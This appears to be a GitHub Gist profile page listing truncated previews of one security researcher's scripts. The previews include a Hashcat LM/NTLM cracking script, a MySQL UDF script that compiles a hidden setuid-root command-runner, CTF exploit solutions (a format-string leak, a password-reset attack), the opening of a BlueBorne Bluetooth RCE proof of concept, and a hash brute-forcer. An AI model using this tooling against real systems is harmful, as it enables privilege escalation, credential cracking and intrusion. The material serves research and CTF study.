Skip to content

Instantly share code, notes, and snippets.

Jesus Anton jesux

  • Spain
Block or report user

Report or block jesux

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jesux
jesux / crack-lm-ntlm.sh
Last active May 30, 2019
Hashcat Script to Crack LM + NTLM hashes
View crack-lm-ntlm.sh
#/bin/bash
session=ntlmscript
if [ -z "$1" ]; then
echo "No hashfile supplied"
exit
fi
hashfile=$1
if [ ! -f $hashfile ]; then
echo "[ERROR] File not exists."
@jesux
jesux / patatas-udf.sh
Last active Jul 13, 2018
MySQL UDF script
View patatas-udf.sh
#!/bin/bash
mkdir -vp /var/tmp/.patatas/;cd /var/tmp/.patatas/
echo '
#include <stdio.h>
#include <unistd.h>
int main(int argc, char** argv) {setuid(0);setgid(0);printf("%d\n", geteuid());system(argv[1]);return 0;}
' > suid.c
gcc suid.c -o suid
@jesux
jesux / nullcon2018-web3.py
Created Feb 12, 2018
Nullcon 2018 - Web 3 - CTRL+Z
View nullcon2018-web3.py
import hashlib
import requests
import time
def reset(instance, user):
headers = {'Cookie': '_globalinstancekey='+instance}
data= {'phone': user}
response = requests.post('http://phonecorp.hackxor.net/reset', headers=headers, data=data)
print response.text
@jesux
jesux / nullcon2018-exp1.py
Last active Feb 12, 2018
Nullcon 2018 - Exploitation 1
View nullcon2018-exp1.py
import binascii
from pwn import *
def get(i):
r.sendline('set A %' + str(i) + '$x')
r.recvuntil('> ')
r.sendline('get A')
rec = r.recvuntil('> ').split('\n')
value = rec[1]
View diff.py
import sys
import os.path
def main(files):
nfiles = len(files)
if nfiles < 2:
sys.exit("Usage: %s file1 file2 ... " % sys.argv[0])
# Check files
for filename in files:
@jesux
jesux / blueborne-nexus5.py
Created Nov 3, 2017
Blueborne RCE PoC - Nexus5 6.0.1
View blueborne-nexus5.py
import os
import sys
import time
import struct
import select
import binascii
import bluetooth
from bluetooth import _bluetooth as bt
@jesux
jesux / money.py
Created Nov 8, 2016
Money CTF #NN6ED
View money.py
import socket
import re
from pyblake2 import blake2b
import itertools
import uu
import StringIO
import requests
charset = '0123456789abcdef'
@jesux
jesux / blake2.py
Created Nov 8, 2016
Money CTF #nn6ed
View blake2.py
from pyblake2 import blake2b
import itertools
import sys
charset = '0123456789abcdef'
keylen = 6
def crack(blake):
for c in itertools.product(charset, repeat=6):
password = ''.join(c)
@jesux
jesux / gitupdate.sh
Created Jan 5, 2016
Update git tools
View gitupdate.sh
#!/bin/bash
BLUE="\033[01;34m" # Heading
RESET="\033[00m" # Normal
DIR=`pwd`
for line in `ls -1 -d *`;
do
if [ -d ${line}/.git ]; then
@jesux
jesux / solitaire-inverse.py
Last active Mar 16, 2018
Python implementation of Bruce Schneier's Solitaire with inverse decrypt
View solitaire-inverse.py
#!/bin/env python
"""
Python implementation of Bruce Schneier's Solitaire Encryption
Algorithm.
John Dell'Aquila <jbd@alum.mit.edu>
@jesux
- Final deck decrypt
- Set deck order without passphrase
You can’t perform that action at this time.